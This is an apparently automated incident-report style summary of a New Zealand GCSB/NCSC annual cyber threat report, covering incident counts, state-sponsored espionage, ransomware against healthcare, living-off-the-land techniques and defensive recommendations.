Full Report
The New Zealand’s National Cyber Security Centre (NCSC), a part of the Government Communications Security Bureau (GCSB) revealed... The post GCSB report reveals sophisticated attacks, boosts cyber resilience amid rising espionage and ransomware appeared first on Industrial Cyber.
Analysis Summary
# Incident Report: New Zealand National Cyber Threat Landscape (2023/2024)
## Executive Summary
New Zealand faced 7,122 cybersecurity incidents in the period ending June 30, 2024, indicating an increasingly sophisticated threat landscape driven by both foreign state actors and financially motivated criminals. State-sponsored activity targeted espionage, while criminal actors focused heavily on sectors like healthcare through persistent ransomware threats. The overall response involved increased monitoring and operational disruption efforts, though the threat remains dynamic and complex.
## Incident Details
- Discovery Date: Throughout the reporting period ending June 30, 2024.
- Incident Date: Reporting period 2023–2024.
- Affected Organization: Broad impact across New Zealand public and private sectors, with specific mention of Government organizations, healthcare, information media, and telecommunications.
- Sector: Governance, Healthcare, Information Media, Telecommunications, Critical Services, Education.
- Geography: New Zealand.
## Timeline of Events
### Initial Access
- Date/Time: Ongoing throughout the reporting period.
- Vector: Not specified for individual incidents, but inferred vectors include exploitation leading to ransomware, potential software supply chain compromise, and targeted intrusion against government/high-value entities. Includes cyber-enabled fraud using compromised business email accounts.
- Details: State actors target information of high intelligence value. Financially motivated actors often target healthcare for increased ransom probability.
### Lateral Movement
- Details: Malicious actors, particularly state-sponsored ones, utilize **Living-Off-the-Land (LOTL)** tradecraft to maintain persistence and move undetected within networks for extended periods, often for espionage.
### Data Exfiltration/Impact
- Details: Data exfiltration is leveraged by ransomware actors for double extortion. Impacts include the loss of data (sometimes irretrievably), disruption of critical public services, operational downtime, and reputational damage. DDoS attacks were also used as a form of extortion in lieu of encryption.
### Detection & Response
- Detection: Incidents reported to the NCSC, resulting in 343 incidents of potential national significance recorded.
- Response Actions: Disruption efforts targeting actors and taking down infrastructure resulted in a temporary decrease in financially motivated cyber incidents. Response also involved addressing increased activity linked to the Russia-Ukraine conflict fallout.
## Attack Methodology
- Initial Access: Targeted intrusion, exploitation leading to ransomware/DDoS, Business Email Compromise (BEC).
- Persistence: Favouring **Living-Off-the-Land (LOTL)** techniques, favored by state actors for long-term access.
- Privilege Escalation: Not explicitly detailed, but implied for achieving impact goals.
- Defense Evasion: Use of LOTL tradecraft to evade detection.
- Credential Access: Implied through BEC and sophisticated intrusion methods necessary for ransomware deployment.
- Discovery: Targeted reconnaissance for high-value intelligence by state actors.
- Lateral Movement: Use of established persistence (persistence stage) to move within the network.
- Collection: Exfiltration of data for double extortion; acquisition of high intelligence value information by state actors.
- Exfiltration: Data exfiltration used to drive extortion demands.
- Impact: Service disruption (including DDoS), data loss/encryption (ransomware), and reputational harm.
## Impact Assessment
- Financial: Significant economic harm due to ransomware demands and operational disruption; rising scale of online scams and cyber-enabled fraud.
- Data Breach: Sensitive information targeted by state actors; data exfiltration used for extortion by criminal groups.
- Operational: Significant disruption to critical public services (especially healthcare), temporary inconvenience to major organizations.
- Reputational: Diminished public or customer trust following incidents.
## Indicators of Compromise
*IOCs were not detailed in the source material as focus was on threat trends and tactics.*
- Network indicators: [N/A]
- File indicators: [N/A]
- Behavioral indicators: Use of LOTL tradecraft for persistence and evasion.
## Response Actions
- Containment: Focused disruption efforts against criminal infrastructure and actor arrest campaigns led to a temporary dip in ransomware activity.
- Eradication: [Specific eradication steps not detailed in the high-level report.]
- Recovery: Efforts to restore critical services and confidence following impactful incidents.
## Lessons Learned
- Threat actors (both state and criminal) are increasingly sophisticated, leveraging global instability (e.g., geopolitical conflicts) to fuel activity.
- Ransomware actors are evolving beyond encryption, prioritizing data exfiltration for continuous extortion leverage (double extortion).
- Cyber criminals are dropping ethical barriers, increasingly targeting sensitive entities like hospitals and using victim harassment/threat of life to enforce ransom payments.
- The reliance on LOTL techniques by state actors necessitates advanced monitoring capabilities to detect subtle deviations from normal system behavior.
## Recommendations
- Strengthen organizational awareness and fundamental cybersecurity hygiene across all sectors.
- Harden defenses against ransomware by implementing robust data backup and recovery plans, and preparing for double extortion scenarios.
- Enhance threat hunting capabilities focused on detecting Living-Off-the-Land (LOTL) techniques to counter state-sponsored persistence.
- Organizations must understand that threats are dynamic; cyber criminals are quickly altering methodologies, requiring adaptive risk management.